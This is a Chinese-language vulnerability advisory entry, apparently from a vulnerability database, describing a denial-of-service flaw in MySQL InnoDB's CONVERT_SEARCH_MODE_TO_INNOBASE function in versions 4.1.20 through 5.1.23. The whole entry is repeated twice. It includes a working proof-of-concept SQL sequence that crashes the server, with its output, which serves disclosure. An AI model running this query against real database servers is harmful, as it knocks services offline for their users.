VULHUB ™

MySQL Server是一款开放源代码的数据库程序。&lt;br /&gt; MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE函数存在输入验证问题，远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。&lt;br /&gt; 提交如下的查询，可导致MySQL服务器崩溃：&lt;br /&gt; mysql&gt; CREATE TABLE `test` (&lt;br /&gt; `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,&lt;br /&gt; `foo` text NOT NULL&lt;br /&gt; ) ENGINE=InnoDB DEFAULT CHARSET=latin1;&lt;br /&gt; Query OK, 0 rows affected&lt;br /&gt; mysql&gt; SELECT * FROM test WHERE CONTAINS(foo, 'bar');&lt;br /&gt; Empty set&lt;br /&gt; mysql&gt; ALTER TABLE test ADD INDEX (foo(100));&lt;br /&gt; Query OK, 0 rows affected&lt;br /&gt; Records: 0 Duplicates: 0 Warnings: 0&lt;br /&gt; mysql&gt; SELECT * FROM test WHERE CONTAINS(foo, 'bar');&lt;br /&gt; ERROR 2013 : Lost connection to MySQL server during query&lt;br /&gt; &lt;br /&gt; MySQL AB MySQL 5.1.23 MySQL AB MySQL 5.1.17 MySQL AB MySQL 5.1.16 MySQL AB MySQL 5.0.44 MySQL AB MySQL 4.1.20 目前没有详细漏洞细节提供： <a href="http://www.mysql.com/" target="_blank">http://www.mysql.com/</a>

MySQL Server是一款开放源代码的数据库程序。&lt;br /&gt; MySQL Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE函数存在输入验证问题，远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。&lt;br /&gt; 提交如下的查询，可导致MySQL服务器崩溃：&lt;br /&gt; mysql&gt; CREATE TABLE `test` (&lt;br /&gt; `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,&lt;br /&gt; `foo` text NOT NULL&lt;br /&gt; ) ENGINE=InnoDB DEFAULT CHARSET=latin1;&lt;br /&gt; Query OK, 0 rows affected&lt;br /&gt; mysql&gt; SELECT * FROM test WHERE CONTAINS(foo, 'bar');&lt;br /&gt; Empty set&lt;br /&gt; mysql&gt; ALTER TABLE test ADD INDEX (foo(100));&lt;br /&gt; Query OK, 0 rows affected&lt;br /&gt; Records: 0 Duplicates: 0 Warnings: 0&lt;br /&gt; mysql&gt; SELECT * FROM test WHERE CONTAINS(foo, 'bar');&lt;br /&gt; ERROR 2013 : Lost connection to MySQL server during query&lt;br /&gt; &lt;br /&gt; MySQL AB MySQL 5.1.23 MySQL AB MySQL 5.1.17 MySQL AB MySQL 5.1.16 MySQL AB MySQL 5.0.44 MySQL AB MySQL 4.1.20 目前没有详细漏洞细节提供： <a href="http://www.mysql.com/" target="_blank">http://www.mysql.com/</a>